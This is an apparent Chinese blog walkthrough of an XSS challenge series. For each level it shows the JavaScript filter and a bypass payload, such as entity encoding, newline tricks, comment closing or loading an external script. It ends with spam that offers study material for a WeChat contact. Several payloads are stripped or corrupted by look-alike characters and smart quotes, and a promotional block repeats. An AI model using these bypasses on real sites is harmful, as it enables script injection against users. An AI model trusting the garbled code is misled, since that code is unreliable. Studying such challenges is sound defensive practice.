0x01
使用payload****即可绕过。
源代码使用了 来输出,我们使用闭合标签来闭合它俩,即可成功执行。
源代码加上我们的paylaod即为
0x02
这里使用了标签,思路是通过闭合payload。
asdf’">'
加上闭合payload后,总代码为
function render (input) {
return ‘’‘">’
}
0x03(使用了正则过滤圆括号)
这里服务器用了一些正则过滤
function render (input) {
const stripBracketsRe = /[()]/g
input = input.replace(stripBracketsRe, ‘’)
return input
}
这段函数的作用是从输入的字符串中移除所有括号(包括圆括号和方括号)。具体来说,它会执行以下操作:
定义一个正则表达式 stripBracketsRe,用于匹配字符串中的所有圆括号和方括号。
调用 replace() 方法将输入字符串中匹配到的所有括号用空字符串替换掉,得到一个不包含任何括号的新字符串。
返回新字符串。
需要注意的是,该函数仅仅只是移除括号,并不会对字符串做其他处理,例如去除空格、转换大小写等等。
这里可以采用反引号来绕过
其它解法
虽然过滤了圆括号,我们只需要使用不带圆括号的payload即可。
第一种
其中onerror编码了alert(1)
第二种
使用了script中的src来导入js
0x04(使用正则过滤圆括号和反引号)
源代码是这样的,它过滤了圆括号和反引号。
所以只能使用HTML实体编码来绕过。
function render (input) {
const stripBracketsRe = /[()`]/g
input = input.replace(stripBracketsRe, ‘’)
return input
}
直接将括号转成html实体编码将没有用
比如这段代码
****如果直接输上去肯定不行,因为
HTML实体编码是为了在HTML文本中使用特殊字符而设计的一种编码方式,比如“<”、“>”、“&”等字符。这些字符在HTML中具有特殊含义,如果直接在HTML文本中使用它们,会导致浏览器将其解释为HTML标签或其他特殊字符,从而破坏文档结构。
因此,在HTML中使用这些字符时,需要将其替换为对应的实体编码形式,例如“<”用“<”代替,“>”用“>”代替,“&”用“&”代替。这样,浏览器就能正确地解析这些字符而不会破坏文档结构。
在这个例子中,代码中的括号“(`)”被替换为了实体编码“(”和“)”,这是为了避免浏览器将其解释为JavaScript语句的一部分。当浏览器遇到这段代码时,它会将其解析为一个普通的文本字符串而不会执行其中的JavaScript语句。
所以只能使用一个标签**<img src=1 οnerrοr="alert(1)“**就可以
0x05(绕过html注释符)
服务器源代码是这样的
function render (input) {
input = input.replace(/–>/g, ‘😂’)
return ‘
’
}
意思就是
根据该函数的实现逻辑,只有输入中包含字符串 “–>” 才会被替换为笑脸表情符号 “😂”。因此,只要输入中不包含 “–>” 这个字符串,就可以绕过这个函数的替换操作,从而可能产生一些安全隐患。
在html中注释符不仅仅只能为** 还可以为<!-- asdf --!>**
所以就可以来尝试闭合了
payload为**–!>img src=x οnerrοr=alert(1)>**即可绕过
0x06(使用换行绕过)
这是服务器过滤代码,
这段代码是一个 JavaScript 函数,名为
render。该函数接受一个字符串参数input,并返回一个 HTML 的 input 元素。这个函数的作用是将
input字符串中出现的 “auto”、“on.*=”、“>” 字符替换为下划线(“_”),并将这个替换后的字符串作为 input 元素的属性,最终生成的 input 元素类型为 text,且默认值为 1。
function render (input) {
input = input.replace(/auto|on.*=|>/ig, ‘_’)
return <input value=1 ${input} type="text">
}
οnmοuseοver=asdf,这样会被过滤掉,被过滤成下划线了,所以如果在=后加上一个换行符即可绕过。
payload即为 **onmouseover
alert(1)**
0x07(img不加闭合符)
服务器源代码如下:
正则表达式
/<\/?[^>]+>/gi的含义如下:
/<\/?[^>]+>/: 匹配<和>之间的任意字符,其中<\/?匹配<或者</,[^>]+匹配一个或多个非>的字符,>匹配>字符本身。这个正则表达式匹配 HTML 标签的开始和结束标记。/g: 表示全局匹配,即匹配到一个后继续匹配,直到没有匹配项。/i: 表示忽略大小写匹配。因此,这个正则表达式可以匹配所有的 HTML 标签,包括开始标记和结束标记,例如
<p>、</p>、<img>、</img>等等。将这个正则表达式传递给replace()方法,就可以将匹配到的 HTML 标签替换为空字符串,从而去掉 HTML 标签。
function render (input) {
const stripTagsRe = /</?[^>]+>/gi
input = input.replace(stripTagsRe, ‘’)
return <article>${input}</article>
}
当有**<123>时,就全部会被过滤掉,但是如果<123**就不会被过滤掉。
payload即为:<img src=“123” οnerrοr=“alert(1)”
0x08(使用换行绕过)
服务器源代码如下
正则表达式
/<\/?[^>]+>/gi的含义如下:
/<\/?[^>]+>/: 匹配<和>之间的任意字符,其中<\/?匹配<或者</,[^>]+匹配一个或多个非>的字符,>匹配>字符本身。这个正则表达式匹配 HTML 标签的开始和结束标记。/g: 表示全局匹配,即匹配到一个后继续匹配,直到没有匹配项。/i: 表示忽略大小写匹配。因此,这个正则表达式可以匹配所有的 HTML 标签,包括开始标记和结束标记,例如
<p>、</p>、<img>、</img>等等。将这个正则表达式传递给replace()方法,就可以将匹配到的 HTML 标签替换为空字符串,从而去掉 HTML 标签。
function render (src) {
src = src.replace(/</style>/ig, ‘/* \u574F\u4EBA */’)
return `
`
}
使用换行即可进行绕过
</style
}
return ‘Invalid URL’
}
payload如下
https://www.segmentfault.com">//
先将前面的script闭合,然后再使用js代码实现弹框1,然后通过**//**将后面的script给注释掉。
0x0A(URL重定向)
服务器源代码:
这段代码是一个JavaScript函数,它的名称是
render。该函数接受一个字符串参数input,并根据该参数返回不同的结果。函数内部定义了一个嵌套函数
escapeHtml,该函数用于将字符串中的特殊字符进行转义,以便在HTML中显示。具体来说,该函数会将字符串中的&、'、"、<、>和/替换为相应的HTML实体编码。该函数的主要逻辑是检查输入的字符串是否是以
https://www.segmentfault.com开头的URL。如果是,函数会将该URL插入到一个<script>标签的src属性中,并返回该标签的HTML字符串表示。如果输入的字符串不是以https://www.segmentfault.com开头的URL,则返回字符串"Invalid URL"。总之,这段代码的作用是根据输入的字符串生成一个HTML字符串表示,其中如果输入的字符串是符合条件的URL,将生成一个包含该URL的
<script>标签。
function render (input) {
function escapeHtml(s) {
return s.replace(/&/g, ‘&’)
.replace(/‘/g, ‘’’)
.replace(/“/g, '”')
.replace(/</g, ‘<’)
.replace(/>/g, ‘>’)
.replace(///g, ‘/’)
}
const domainRe = /^https?😕/www.segmentfault.com/
if (domainRe.test(input)) {
return <script src="${escapeHtml(input)}"></script>
}
return ‘Invalid URL’
}
这段代码大概就是把很多能注入的关键词都给过滤了。
输入的内容最前面必须加上一段网址和上关一样。
所以使用上一关的闭合符将不管用了。
但是根据这个src看来,可以使用引入一段服务器上js代码。
可以使用@重定向来定向到js代码。在服务器中写入一段js代码,使用@重定向来导入js。
但是我不知道为什么一直不成功,所以根据使用官方给出的js代码,不使用自己服务器中的代码来导入js就可以。
payload:
https://www.segmentfault.com.haozi.me/j.js
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a1hmJrNg-1679873092880)(C:\Users\陈勇\AppData\Roaming\Typora\typora-user-images\image-20230326160646711.png)]
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
写在最后
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。
需要完整版PDF学习资源私我
一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!
AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算
本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。**
需要完整版PDF学习资源私我
一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!
AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算
扫一扫
217
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
